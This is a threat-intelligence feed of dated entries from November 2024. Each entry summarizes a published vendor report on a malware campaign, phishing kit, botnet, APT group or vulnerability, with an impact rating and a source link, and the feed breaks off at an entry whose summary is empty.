Intel Source:
Trellix
Intel Name:
When_Guardians_Become_Predators
Date of Scan:
2024-11-20
Impact:
LOW
Summary:
A recent discovery by Trellix's Advanced Research Center reveals a concerning malware campaign that weaponizes a legitimate Avast Anti-Rootkit driver to bypass security measures and gain control over infected systems. The malware drops the trusted kernel-mode driver "aswArPot.sys" onto the system and installs it as a service, giving it access to critical system processes. This high-level access enables the malware to terminate antivirus and endpoint detection processes, undermining the system's defenses. By leveraging the Avast driver to terminate security software, the malware evades detection and escalates its control.
Source: https://www.trellix.com/blogs/research/when-guardians-become-predators-how-malware-corrupts-the-protectors/
2024-11-20
New_Silver_Shifting_Yak_Banking_Trojan
LOW
Intel Source:
SCI Labs
Intel Name:
New_Silver_Shifting_Yak_Banking_Trojan
Date of Scan:
2024-11-20
Impact:
LOW
Summary:
SCILabs researchers have identified a new banking trojan named Silver Shifting Yak and provided the tactics, techniques, and procedures (TTPs). The Trojan primarily targets financial institutions and Microsoft services in Latin America, stealing sensitive data such as login credentials. Notably, it employs dynamic URL alterations for its command-and-control (C2) server and uses varied domain names to evade detection. While the exact distribution method remains unclear, it is likely spread via malicious email attachments disguised as invoices or documents, similar to other regional threats.
Source: https://blog.scilabs.mx/en/new-silver-shifting-yak-banking-trojan/
2024-11-20
GitHub_Hosted_Phishing_Campaign
LOW
Intel Source:
CERT-AGID
Intel Name:
GitHub_Hosted_Phishing_Campaign
Date of Scan:
2024-11-20
Impact:
LOW
Summary:
CERT-AGID researchers have uncovered a phishing campaign targeting users of WeTransfer, a popular file-sharing service, and cPanel, a web hosting control panel. The attackers send fake emails with links claiming to share files, but these links redirect victims to a website that closely mimics the cPanel Webmail login page. This fake page is hosted on GitHub to make the scam appear more legitimate. When victims enter their credentials on this fake page, information such as the login details, the email provider's server details (MX records), and the geolocation derived from their IP address is secretly sent to a Telegram bot controlled by the attackers.
Source: https://cert-agid.gov.it/news/phishing-ospitato-su-github-ruba-credenziali-utilizzando-telegram/
2024-11-20
Zero_Day_Vulnerability_in_Windows
MEDIUM
Intel Source:
ClearSky
Intel Name:
Zero_Day_Vulnerability_in_Windows
Date of Scan:
2024-11-20
Impact:
MEDIUM
Summary:
A new zero-day vulnerability (CVE-2024-43451) has been discovered in several Windows systems, affecting the activation of malicious URL files. The vulnerability can be triggered through a variety of actions, including right-clicking the file, deleting it in Windows 10/11, or dragging it to another folder on Windows 10/11 and some versions of Windows 7/8/8.1. These files were found to be downloaded from an official Ukrainian government website, where users typically access academic certificates. The vulnerability is being exploited by the threat actor UAC-0194, suspected to be Russian, as part of a campaign targeting Ukrainian entities. The issue has been reported to CERT-UA and Microsoft, who released a security patch on November 12, 2024, to address the flaw.
Source: https://www.clearskysec.com/wp-content/uploads/2024/11/Zero-day-cve-2024-4351-report.pdf
2024-11-20
ApateWeb_Campaign_Updates
LOW
Intel Source:
Palo Alto
Intel Name:
ApateWeb_Campaign_Updates
Date of Scan:
2024-11-20
Impact:
LOW
Summary:
Palo Alto discovered new indicators on entry point infrastructure for the ApateWeb campaign, first reported in their January 2024 article.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-11-19-IOC-updates-for-ApateWeb-campaign.txt
2024-11-20
New_Variant_of_MIMIC_Ransomware
MEDIUM
Intel Source:
Cyfirma
Intel Name:
New_Variant_of_MIMIC_Ransomware
Date of Scan:
2024-11-20
Impact:
MEDIUM
Summary:
Researchers at Cyfirma have uncovered a sophisticated dropper binary that deploys the ELPACO-team ransomware, a new variant of the MIMIC ransomware. Upon execution, it uses various malicious tools and legitimate utilities to disable system defenses, encrypt numerous file types, and ensure persistence. The ransomware targets critical files on both local and network drives, leaving a ransom note for the victim. It specifically encrypts certain file extensions while excluding others to avoid damaging vital system files, posing a significant threat to individuals and enterprises by evading detection and complicating recovery.
Source: https://www.cyfirma.com/research/elpaco-team-ransomware-a-new-variant-of-the-mimic-ransomware-family/
2024-11-19
macOS_Atomic_Stealers
MEDIUM
Intel Source:
SentinelOne
Intel Name:
macOS_Atomic_Stealers
Date of Scan:
2024-11-19
Impact:
MEDIUM
Summary:
The "Atomic Stealer" family of malware, originally launched in 2023 as a project tied to ChatGPT, has rapidly evolved into a significant threat targeting macOS users, particularly in 2024. Known for its ability to spoof enterprise apps and evade security measures, this malware has grown into a Malware-as-a-Service (MaaS) offering, with variants like Amos, Banshee, Poseidon, and Cthulhu spreading through businesses. These stealers often use sophisticated evasion techniques, such as obfuscating code, using encoded strings, and exploiting AppleScript to bypass security controls. Different variants are written in languages like Go, Objective-C, and C++, each exhibiting unique characteristics but sharing the goal of stealing sensitive data, including cryptocurrency wallets and user credentials.
Source: https://www.sentinelone.com/blog/from-amos-to-poseidon-a-soc-teams-guide-to-detecting-macos-atomic-stealers-2024
2024-11-19
Use_and_Abuse_of_NSOCKS_Botnet
MEDIUM
Intel Source:
Black Lotus Labs
Intel Name:
Use_and_Abuse_of_NSOCKS_Botnet
Date of Scan:
2024-11-19
Impact:
MEDIUM
Summary:
Black Lotus Labs, part of Lumen Technologies, has uncovered critical details about the “ngioweb” botnet, a major component of the notorious NSOCKS criminal proxy service. Operating globally across 180 countries, NSOCKS leverages over 35,000 bots daily, with the majority originating from the ngioweb botnet, which infects small office/home office routers and IoT devices. This botnet is heavily used for malicious activities, including distributed denial of service (DDoS) attacks, credential stuffing, and phishing. The infrastructure behind NSOCKS includes over 180 backconnect command-and-control (C2) nodes that route traffic to disguise users' identities. These proxies are often exploited by cybercriminals to amplify attacks and avoid detection, with substantial overlap between NSOCKS and other illicit proxy services like Shopsocks5.
Source: https://blog.lumen.com/one-sock-fits-all-the-use-and-abuse-of-the-nsocks-botnet/
2024-11-19
Space_Pirates_Hacker_Group
MEDIUM
Intel Source:
PT Security
Intel Name:
Space_Pirates_Hacker_Group
Date of Scan:
2024-11-19
Impact:
MEDIUM
Summary:
The "Space Pirates" hacker group, first identified by Positive Technologies in 2019, has been targeting Russian aerospace and government organizations, as well as other state-owned enterprises in Russia, Georgia, and Mongolia, with espionage and data theft operations. Their malware toolkit includes unique backdoors like MyKLoadClient, BH_A006, and Deed RAT, as well as commonly used malware such as PlugX and ShadowPad. The group, believed to have Asian origins due to language usage and toolsets linked to Chinese hacker groups, has connections with other APT groups, notably TA428, suggesting collaboration and shared resources. Notably, Space Pirates uses a variety of techniques, including phishing and DLL side-loading, to install malware and maintain persistent access to compromised networks.
Source: https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections
2024-11-19
Earth_Kasha_New_LODEINFO_Campaign
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Earth_Kasha_New_LODEINFO_Campaign
Date of Scan:
2024-11-19
Impact:
MEDIUM
Summary:
LODEINFO is a malware used in attacks primarily targeting Japan since 2019, tracked by Trend Micro under the name Earth Kasha. While some vendors link the group to APT10, there is insufficient evidence to confirm this connection, leading to the use of the term APT10 Umbrella to describe related intrusion sets. Earth Kasha has historically targeted public institutions and academics through spear-phishing. However, from early 2023 to 2024, the group has significantly updated its tactics, techniques, and tools in a new campaign.
Source: https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html
2024-11-19
Malicious_Browser_Extension_Samples
LOW
Intel Source:
Pepe Berba
Intel Name:
Malicious_Browser_Extension_Samples
Date of Scan:
2024-11-19
Impact:
LOW
Summary:
Pepe Berba details how to acquire and analyze malicious browser extension samples on a limited budget, using free resources and basic cryptanalysis techniques. Starting with a sample referenced in a blog post about malware bypassing Google Chrome's Manifest V3, he demonstrates how to track down similar malicious extensions through creative searching of hashes and features, such as unique directory structures. By leveraging free tools like VirusTotal, MalwareBazaar, and URLscan, and employing cryptographic analysis to decode obfuscated payloads, Berba was able to obtain and decrypt malicious extensions. He further explores the process of tracking new samples, analyzing their evolution over time, and decrypting C2 domain information embedded in blockchain transactions.
Source: https://pberba.github.io/crypto/2024/09/14/malicious-browser-extension-genesis-market/
2024-11-19
Detecting_Debugger_Presence_on_Linux_Systems
LOW
Intel Source:
ISC.SANS
Intel Name:
Detecting_Debugger_Presence_on_Linux_Systems
Date of Scan:
2024-11-19
Impact:
LOW
Summary:
ISC.SANS researchers have discussed methods for detecting the presence of a debugger on a Linux system. The diary highlights various techniques that malware and security researchers use to identify whether a debugger is attached to a process, which can help in evading analysis or reverse engineering. It outlines specific tools and system checks, such as examining `/proc/[pid]/status` for signs of debugging or using ptrace system calls to monitor process behavior. It also covers potential countermeasures, including the manipulation of system calls and environment variables to hide or mask debugging activity.
Source: https://isc.sans.edu/diary/Detecting+the+Presence+of+a+Debugger+in+Linux/31450/
2024-11-19
Vidar_Malware_Targets_Italian_PEC_Accounts_Again
LOW
Intel Source:
CERT-AGID
Intel Name:
Vidar_Malware_Targets_Italian_PEC_Accounts_Again
Date of Scan:
2024-11-19
Impact:
LOW
Summary:
The Vidar malware has resurfaced, targeting Italian email accounts once again, using compromised PEC accounts as a source for its attacks. This new campaign introduces a shift in tactics, utilizing VBS files to execute PS1 scripts. Notably, over 100 domains and nearly 1,000 subdomains were created to host the VBS files, with URLs initially inactive and only activated on November 18, suggesting strategic timing. The attackers appear to favor launching these campaigns on Sundays to target recipients at the start of the work week. Vidar remains a significant threat, capable of stealing sensitive information, and the use of compromised PEC accounts makes it particularly deceptive and dangerous.
Source: https://cert-agid.gov.it/news/il-malware-vidar-evolve-con-nuove-strategie-di-diversificazione-dei-domini/
2024-11-19
Helldown_Ransomware_Targets_Linux
LOW
Intel Source:
Sekoia
Intel Name:
Helldown_Ransomware_Targets_Linux
Date of Scan:
2024-11-19
Impact:
LOW
Summary:
Researchers from Sekoia have discovered a Linux variant of the Helldown ransomware, which was previously only known to target Windows PCs. Cyfirma first reported the Helldown group in August 2024; it uses double extortion techniques, exfiltrating critical data and threatening to disclose it unless ransoms are paid. With 31 victims, including Zyxel's European subsidiary, claimed within three months, the group has been very active.
Source: https://blog.sekoia.io/helldown-ransomware-an-overview-of-this-emerging-threat/
2024-11-19
FrostyGoop_Closer_Look
MEDIUM
Intel Source:
Palo Alto
Intel Name:
FrostyGoop_Closer_Look
Date of Scan:
2024-11-19
Impact:
MEDIUM
Summary:
Unit 42 detailed the FrostyGoop malware, also known as BUSTLEBERM, which emerged as a significant threat to operational technology (OT) infrastructure in 2024. Its notable attack disrupted heating for over 600 buildings in Ukraine during sub-zero temperatures by exploiting vulnerabilities in ICS/OT devices using the Modbus TCP protocol. This marks it as the ninth known OT-centric malware and the first to disrupt critical infrastructure on this scale. FrostyGoop's capabilities include reading and modifying data on industrial control devices, often using JSON configuration files for targeted attacks. Analysis revealed the malware's use of open-source libraries, debugger evasion techniques, and associated tools like go-encrypt.exe, suspected for concealing configuration data.
Source: https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/
2024-11-19
Ngioweb_Proxy_Server_Botnet
LOW
Intel Source:
LevelBlue
Intel Name:
Ngioweb_Proxy_Server_Botnet
Date of Scan:
2024-11-19
Impact:
LOW
Summary:
The Ngioweb proxy server botnet, active for over seven years, continues to grow and evolve with minimal changes to its core code. Initially observed in 2017 and linked to the Ramnit malware family, Ngioweb's primary function is to infect vulnerable residential devices—such as routers, cameras, and IoT devices—by exploiting various vulnerabilities, including newly discovered zero-days. Once infected, these devices are sold on the black market as residential proxies via platforms like Nsocks, offering cheap access to nearly 30,000 global IPs. The botnet's impact is substantial, with over 75% of infected devices being residential ISP users, and growing demand for proxies used in malicious activities, such as cyberattacks and evading detection.
Source: https://levelblue.com/blogs/labs-research/ngioweb-remains-active-7-years-later
2024-11-19
Raspberry_Robin_Analysis
MEDIUM
Intel Source:
ZScaler
Intel Name:
Raspberry_Robin_Analysis
Date of Scan:
2024-11-19
Impact:
MEDIUM
Summary:
Zscaler researchers deep dive into Raspberry Robin, a sophisticated malware with a multi-layered architecture designed to evade detection and analysis. Its execution involves eight distinct layers, each employing unique obfuscation and anti-analysis techniques. Early layers use methods like XOR decryption, modified compression algorithms, and CPU performance checks to bypass sandboxes or analysis environments. Notably, the malware uses advanced anti-analysis tactics, such as detecting emulated environments through CPU write-combining or examining system hardware configurations. If evasion fails, it deploys a decoy payload designed to assess the analysis environment. Later stages leverage control flow flattening, encrypted function keys, and Mixed Boolean-Arithmetic operations, further complicating analysis.
Source: https://www.zscaler.com/blogs/security-research/unraveling-raspberry-robin-s-layers-analyzing-obfuscation-techniques-and
2024-11-18
Gabagool_Phishing_Kit
MEDIUM
Intel Source:
TRAC Labs
Intel Name:
Gabagool_Phishing_Kit
Date of Scan:
2024-11-18
Impact:
MEDIUM
Summary:
The "Gabagool" phishing campaign, identified by TRAC Labs, is targeting corporate and government employees using a sophisticated method involving Cloudflare R2 buckets. These buckets, which are typically used for hosting large volumes of unstructured data, are being exploited by attackers to host malicious phishing landing pages, leveraging Cloudflare's trusted reputation to bypass security filters. The attack begins with email account compromise, followed by phishing emails containing links to fake documents hosted on platforms like SharePoint or Box. Victims who click on these links are redirected to malicious Cloudflare R2-hosted pages designed to harvest login credentials. The phishing kit uses obfuscated JavaScript to detect and avoid bots, while carefully crafted POST requests collect sensitive information like email addresses and passwords, even accounting for multifactor authentication methods.
Source: https://medium.com/@traclabs_/aitm-phishing-hold-the-gabagool-analyzing-the-gabagool-phishing-kit-531f5bbaf0e4
2024-11-18
IoT_Devices_Targeted_by_Water_Barghest
LOW
Intel Source:
Trend Micro
Intel Name:
IoT_Devices_Targeted_by_Water_Barghest
Date of Scan:
2024-11-18
Impact:
LOW
Summary:
Researchers from Trend Micro have revealed that the Water Barghest botnet, which comprised over 20,000 IoT devices by October 2024, monetizes hacked devices by exploiting vulnerabilities and selling them on residential proxy marketplaces. The botnet employs automated scripts to target IoT devices discovered through public internet scan databases such as Shodan.
Source: https://www.trendmicro.com/en_us/research/24/k/water-barghest.html
2024-11-18
ClickFix_Social_Engineering_Technique
LOW
Intel Source:
Proofpoint
Intel Name:
ClickFix_Social_Engineering_Technique
Date of Scan:
2024-11-18
Impact:
LOW
Summary:
Proofpoint researchers have identified a rise in a social engineering technique called ClickFix, used by threat actors to impersonate legitimate software like Microsoft Word, Google Chrome, and specialized software in industries like transportation and logistics. This technique typically involves luring users to a malicious URL or file, where they are shown a dialog box suggesting a document or webpage error. The box provides instructions to fix the issue, either automatically or manually, by executing a malicious script via PowerShell or the Windows Run dialog. ClickFix campaigns have been linked to malware such as AsyncRAT, Danabot, DarkGate, and Lumma Stealer.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
2024-11-18
BabbleLoader
LOW
Intel Source:
Intezer
Intel Name:
BabbleLoader
Date of Scan:
2024-11-18
Impact:
LOW
Summary:
BabbleLoader is an advanced and evasive malware loader designed to bypass traditional antivirus and sandbox defenses. It uses a range of sophisticated evasion techniques, including junk code insertion, metamorphic transformations, and dynamic API resolution, to avoid detection by signature-based, AI-based, and behavioral security systems. The loader also employs shellcode loading and decryption to conceal its payload in memory, bypassing file-based scanning. Anti-sandboxing and anti-analysis features further obstruct virtual environment detection. BabbleLoader has been observed in various campaigns targeting both general users seeking cracked software and business professionals, particularly those in finance and administration, disguised as legitimate software like accounting tools or HR forms.
Source: https://intezer.com/blog/research/babble-babble-babble-babble-babble-babble-babbleloader/
2024-11-18
SVG_Attachment_Used_in_Phishing_Emails
LOW
Intel Source:
MalwareHunterTeam
Intel Name:
SVG_Attachment_Used_in_Phishing_Emails
Date of Scan:
2024-11-18
Impact:
LOW
Summary:
Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to carry out phishing attacks or deploy malware while bypassing traditional detection methods. Unlike common image formats like JPG or PNG, which use pixels to form images, SVGs are vector-based, relying on lines, shapes, and mathematical formulas to describe images. This allows SVGs to scale without losing quality, making them ideal for browser-based applications and harder to detect for malicious use.
Source: https://x.com/malwrhunterteam/status/1857407160528842891 https://x.com/malwrhunterteam/status/1857518555442430184
2024-11-18
QuickBooks_Popup_Scam_via_Google
LOW
Intel Source:
MalwareBytes
Intel Name:
QuickBooks_Popup_Scam_via_Google
Date of Scan:
2024-11-18
Impact:
LOW
Summary:
A persistent scam targeting QuickBooks users, primarily promoted through Google ads, continues to plague victims. Scammers, often based in India, are using two primary tactics: one involves a fraudulent website offering QuickBooks support with a fake phone number, and the other lures users to download a malicious program that generates deceptive popup alerts within QuickBooks. These popups falsely warn users about data corruption, prompting them to call the scammers for help. Victims are often tricked into downloading a program hosted on Dropbox that installs both the legitimate QuickBooks software and a hidden backdoor file, which controls the popup messages. This ongoing scam not only demands payments to fix non-existent issues but also poses further risks, including remote access to victims' computers and the installation of additional malware to steal sensitive data.
Source: https://www.malwarebytes.com/blog/scams/2024/11/quickbooks-popup-scam-still-being-delivered-via-google-ads
2024-11-18
Fake_AI_Generators_Spread_Lumma_and_AMOS_Malware
LOW
Intel Source:
X (Twitter)
Intel Name:
Fake_AI_Generators_Spread_Lumma_and_AMOS_Malware
Date of Scan:
2024-11-18
Impact:
LOW
Summary:
Fake AI image and video generators are infecting Windows and macOS devices with Lumma Stealer and AMOS malware, respectively. These information-stealing threats target cryptocurrency wallets, credentials, passwords, cookies, and browsing history from major browsers like Chrome, Edge, and Firefox. The stolen data is compiled into an archive and sent to attackers for further exploitation or sale on cybercrime marketplaces.
Source: https://x.com/g0njxa/status/1857485682299519034
2024-11-18
Operation_Lunar_Peek
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Operation_Lunar_Peek
Date of Scan:
2024-11-18
Impact:
MEDIUM
Summary:
Palo Alto Networks and Unit 42 are tracking exploitation activity related to a critical vulnerability, CVE-2024-0012, in PAN-OS software, which allows unauthenticated attackers with network access to the management interface to gain administrator privileges and perform malicious actions. While patches for the vulnerability are available, the risk is significantly reduced if access to the management interface is restricted to trusted internal IPs, as per Palo Alto’s best practice guidelines. The observed exploitation, dubbed Operation Lunar Peek, has involved attackers executing commands and deploying malware, such as webshells.
Source: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
2024-11-18
Unpatched_Citrix_Vulnerability_Exploited
LOW
Intel Source:
ISC.SANS
Intel Name:
Unpatched_Citrix_Vulnerability_Exploited
Date of Scan:
2024-11-18
Impact:
LOW
Summary:
Researchers at SANS ISC have discovered a critical, unpatched vulnerability in Citrix's "Virtual Apps and Desktops" remote access solution, which is frequently used for secure remote work configurations. This weakness allows attackers, especially ransomware operators, to gain elevated access, possibly compromising the server and all linked sessions.
Source: https://isc.sans.edu/diary/Exploit+attempts+for+unpatched+Citrix+vulnerability/31446/
2024-11-15
Raspberry_Robin_Infection_Chain_Uses_WebDAV_Server
LOW
Intel Source:
Palo Alto
Intel Name:
Raspberry_Robin_Infection_Chain_Uses_WebDAV_Server
Date of Scan:
2024-11-15
Impact:
LOW
Summary:
A new infection chain for Raspberry Robin, traced back to late October 2024, appears to be distributed through third-party ads on various websites. The campaign involves zip archives (e.g., access.zip, bootstrap.zip) that contain HTA files (e.g., access.hta, bootstrap.hta), each designed to run an obfuscated script hosted on publicly-accessible URLs. These scripts retrieve and execute a Raspberry Robin DLL hosted on a WebDAV server. The WebDAV servers rotate DLL files every 50 minutes, each with a unique size and hash. Testing reveals that the DLLs generate Tor-based command-and-control traffic, a known characteristic of Raspberry Robin.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-11-14-IOCs-for-Raspberry-Robin-activity.txt
2024-11-15
BrazenBamboo_Threat_Actor
MEDIUM
Intel Source:
Volexity
Intel Name:
BrazenBamboo_Threat_Actor
Date of Scan:
2024-11-15
Impact:
MEDIUM
Summary:
Volexity has uncovered a critical zero-day vulnerability in Fortinet's FortiClient VPN software, which BrazenBamboo, a Chinese state-affiliated cyber espionage group, has exploited through their DEEPDATA malware to steal VPN credentials. The vulnerability allows credentials to be extracted from FortiClient’s process memory after user authentication. DEEPDATA, a modular post-exploitation tool, supports a variety of plugins to collect sensitive data, including passwords, chat logs, and WiFi credentials. Volexity also discovered a new Windows variant of the LIGHTSPY malware family, known for targeting multiple platforms including mobile and desktop systems. BrazenBamboo’s operations, which include sophisticated C2 infrastructure, evidence of continued development, and a focus on domestic surveillance, suggest the group provides custom malware capabilities for government clients.
Source: https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/
2024-11-15
SilkSpecter_Group_Targeting_Black_Friday_Shoppers
LOW
Intel Source:
EclecticIQ
Intel Name:
SilkSpecter_Group_Targeting_Black_Friday_Shoppers
Date of Scan:
2024-11-15
Impact:
LOW
Summary:
EclecticIQ researchers have uncovered a phishing campaign targeting e-commerce shoppers in Europe and the USA during the Black Friday shopping season. The campaign, attributed with high confidence to the Chinese financially motivated threat actor SilkSpecter, uses fake discounted products to trick victims into providing sensitive data such as Cardholder Data (CHD), Sensitive Authentication Data (SAD), and Personally Identifiable Information (PII). SilkSpecter exploits the legitimate payment processor Stripe to facilitate covert data exfiltration. The attackers enhance the phishing site's credibility by using Google Translate to adapt the site’s language based on the victim's location. Previous campaigns linked to a Chinese SaaS platform, oemapps, suggest it helps SilkSpecter quickly create convincing phishing sites. The domains involved often use .top, .shop, .store, and .vip TLDs and engage in typosquatting of legitimate e-commerce brands.
Source: https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers
2024-11-15
BeaverTail_and_InvisibleFerret_Malware
MEDIUM
Intel Source:
Esentire
Intel Name:
BeaverTail_and_InvisibleFerret_Malware
Date of Scan:
2024-11-15
Impact:
MEDIUM
Summary:
Researchers at eSentire have identified an attack in which a JavaScript project compromised with BeaverTail malware was downloaded by a software developer. When the developer installed the project, it triggered the execution of malicious files that downloaded and ran another malware called InvisibleFerret. The InvisibleFerret malware is saved on the victim's computer as a hidden file named "sysinfo" and is executed using Python. These malware families steal saved login credentials, collect system information, and target cryptocurrency wallets like Exodus and Solana to extract sensitive data.
Source: https://www.esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2
2024-11-15
North_Korean_IT_Cluster_Phishing_Campaign
LOW
Intel Source:
Palo Alto
Intel Name:
North_Korean_IT_Cluster_Phishing_Campaign
Date of Scan:
2024-11-15
Impact:
LOW
Summary:
Researchers from Palo Alto have observed that North Korean IT cluster CL-STA-0237 is active in scams using malware-infected video apps and most likely operating from Laos. In 2022, this gang hacked a US SMB to gain a tech role, thereby assisting North Korea's illegal projects. Organizations could strengthen hiring practices, detect insider threats, and enforce corporate device policies.
Source: https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cluster/
2024-11-15
DONOT_APT_Targets_Maritime_and_Defense_Manufacture
LOW
Intel Source:
Cyble
Intel Name:
DONOT_APT_Targets_Maritime_and_Defense_Manufacture
Date of Scan:
2024-11-15
Impact:
LOW
Summary:
Cyble researchers have uncovered a campaign operated by the DoNot APT group, also known as APT-C-35, targeting Pakistan's manufacturing sector, including the maritime and defense sectors. This group has been active since 2016 and is known for targeting government, military, and diplomatic organizations across South Asia. In this campaign, attackers use a malicious .LNK file disguised as an RTF document, delivered via spam emails in RAR archives. When the victim clicks on the file, it executes malicious commands through cmd.exe and PowerShell. It connects to a C2 server, sending a unique device ID via POST and receiving commands for actions such as self-destruction, downloading encrypted payloads, or performing additional malicious tasks.
Source: https://cyble.com/blog/donots-attack-on-maritime-defense-manufacturing/
2024-11-15
XLoader_Malware
LOW
Intel Source:
ASEC
Intel Name:
XLoader_Malware
Date of Scan:
2024-11-15
Impact:
LOW
Summary:
ASEC researchers have identified a malware called XLoader which is being distributed through a technique called DLL side-loading. This technique places a legitimate application and a malicious DLL in the same folder so that the malicious file runs when the application starts. The malware is delivered in a compressed file containing the legitimate application along with two malicious DLL files named jli.dll and concrt140e.dll. When the legitimate application runs, it unknowingly triggers the malicious DLLs.
Source: https://asec.ahnlab.com/ko/84431/
2024-11-15
Glove_Stealer_NET_Malware
MEDIUM
Intel Source:
Gen Digital
Intel Name:
Glove_Stealer_NET_Malware
Date of Scan:
2024-11-15
Impact:
MEDIUM
Summary:
Glove Stealer is a sophisticated information-stealing malware observed in phishing campaigns, primarily spread through deceptive emails resembling troubleshooting tools like "ClickFix." Once executed, Glove Stealer targets sensitive data from a wide range of browsers, including Chrome, Firefox, and Edge, as well as over 280 browser extensions and 80 locally installed applications, including cryptocurrency wallets, password managers, 2FA authenticators, and email clients. The malware uses advanced techniques, such as bypassing App-Bound encryption introduced by Google in Chrome 127, by leveraging a supporting module that utilizes the IElevator service. After infecting the victim's system, it exfiltrates data, including cookies, autofill, wallets, and device information, encrypts it using 3DES, and sends it to a remote command-and-control server.
Source: https://www.gendigital.com/blog/news/innovation/glove-stealer
2024-11-14
Cloud_Ransom_Attacks
MEDIUM
Intel Source:
SentinelOne
Intel Name:
Cloud_Ransom_Attacks
Date of Scan:
2024-11-14
Impact:
MEDIUM
Summary:
SentinelOne researchers have observed that attackers are increasingly targeting cloud storage services like Amazon S3 and Azure Blob Storage, where they copy files to their own systems before deleting or encrypting the originals to demand ransom. These attacks often exploit storage misconfigurations that grant write access to cloud storage. Apart from targeting cloud storage, some ransomware groups like BianLian and Rhysida are now using cloud services to exfiltrate data from victims rather than relying on tools like MEGAsync. Furthermore, attackers use Amazon S3 for data exfiltration along with a Python script, RansomES, that exfiltrates files to S3 or FTP before encrypting them locally. Cloud-hosted web applications, such as those built on PHP, are also being targeted by attackers to encrypt files on web servers and other systems.
Source: https://www.sentinelone.com/blog/the-state-of-cloud-ransomware-in-2024/
2024-11-14
A_Deep_Dive_Analysis_of_WezRat
MEDIUM
Intel Source:
Checkpoint
Intel Name:
A_Deep_Dive_Analysis_of_WezRat
Date of Scan:
2024-11-14
Impact:
MEDIUM
Summary:
Checkpoint researchers have investigated a malware called WezRat that is linked to the Iranian cyber group Emennet Pasargad. This group is affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC) and has been involved in various cyber operations across the US, France, Sweden, and Israel. The malware spread through phishing emails targeting Israeli organisations. These emails impersonate the Israeli National Cyber Directorate (INCD) and encourage recipients to click a link for an urgent Google Chrome update. This link redirected victims to a deceptive website where they unknowingly downloaded a file posing as the Chrome installer. This file contains the legitimate browser update but also drops a hidden backdoor named Updater.exe, which is capable of taking screenshots, keylogging, and stealing files, clipboard data, and browser cookies.
Source: https://research.checkpoint.com/2024/wezrat-malware-deep-dive/
2024-11-14
Kimsuky_Group_Analysis
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
Kimsuky_Group_Analysis
Date of Scan:
2024-11-14
Impact:
MEDIUM
Summary:
Researchers at the 360 Advanced Threat Research Institute uncovered a campaign by APT-C-55 (Kimsuky), a North Korean cyber threat group known for targeting South Korean institutions and expanding operations to the U.S., Europe, and other regions to steal intelligence. The group has employed GitHub as a platform for distributing malicious payloads, demonstrating their evolving tactics. Initial attacks began with deceptive LNK files that masked malicious scripts similar to past Kimsuky macros. The payloads accessed through GitHub were designed to collect system information, upload data to a remote server, and execute persistent malware using PowerShell commands. The attackers used social engineering techniques to disguise paths associated with reputable antivirus products to enhance stealth. Additionally, analysis of their infrastructure revealed FTP servers containing data from compromised systems.
Source: https://mp.weixin.qq.com/s/GzMoR8jKjelzuj5BPhpJYA
2024-11-14
Advertisers_Pushing_Popup_Blockers
LOW
Intel Source:
MalwareBytes
Intel Name:
Advertisers_Pushing_Popup_Blockers
Date of Scan:
2024-11-14
Impact:
LOW
Summary:
In a recent investigation, MalwareBytes discovered that advertisers are employing deceptive tactics to push ad and pop-up blockers, leveraging old social engineering tricks. On media sites, misleading ads entice visitors with content that requires additional browser extensions to access. Historically, such scams would request video codecs, but now users are prompted to install extensions like "Adblock Pro" to enable safe mode viewing. This extension directs users to another, "Push Notifications Blocker," which demands extensive permissions and exhibits problematic behavior, including browser slowdowns, unexpected redirects, and altered search results. Classifying this as adware, researchers noted that the same trick was used to promote other popular ad blockers, suggesting an affiliate marketing scheme where commissions are earned from users' installations.
Source: https://www.malwarebytes.com/blog/news/2024/11/advertisers-are-pushing-ad-and-pop-up-blockers-using-old-tricks
2024-11-14
TheftCalls_Detailed_Analysis
LOW
Intel Source:
S2W Talon
Intel Name:
TheftCalls_Detailed_Analysis
Date of Scan:
2024-11-14
Impact:
LOW
Summary:
S2W's TALON team details the activities of "TheftCRow," a voice phishing organization targeting South Korean users through malware. The group distributes apps disguised as legitimate services like financial institutions, luring victims via phishing sites and smishing campaigns. Their malware, TheftCalls Loader, forcibly installs a secondary app, TheftCalls, which can access device functions, record calls, and broadcast live microphone and camera feeds. This malware bypasses permissions and security measures, deletes security apps, and interacts with C2 servers to execute harmful commands.
Source: https://medium.com/s2wblog/detailed-analysis-of-theftcalls-impersonating-frequently-used-korean-apps-c3ebbfd7f746
2024-11-14
DDoSia_Attacks_on_Korean_Institutions
LOW
Intel Source:
ASEC
Intel Name:
DDoSia_Attacks_on_Korean_Institutions
Date of Scan:
2024-11-14
Impact:
LOW
Summary:
Researchers from ASEC have discovered that the Russian hacktivist group NoName057(16), along with pro-Russian supporters, initiated DDoS attacks on South Korean institutions in November 2024, targeting officials who supported Ukraine. Using DDoSia software, they organized volunteers via Telegram, compensating them with cryptocurrency and regularly changing C&C server addresses to avoid detection.
Source: https://asec.ahnlab.com/ko/84426/
2024-11-14
New_PXA_Stealer_targets_Europe_and_Asia
LOW
Intel Source:
Cisco Talos
Intel Name:
New_PXA_Stealer_targets_Europe_and_Asia
Date of Scan:
2024-11-14
Impact:
LOW
Summary:
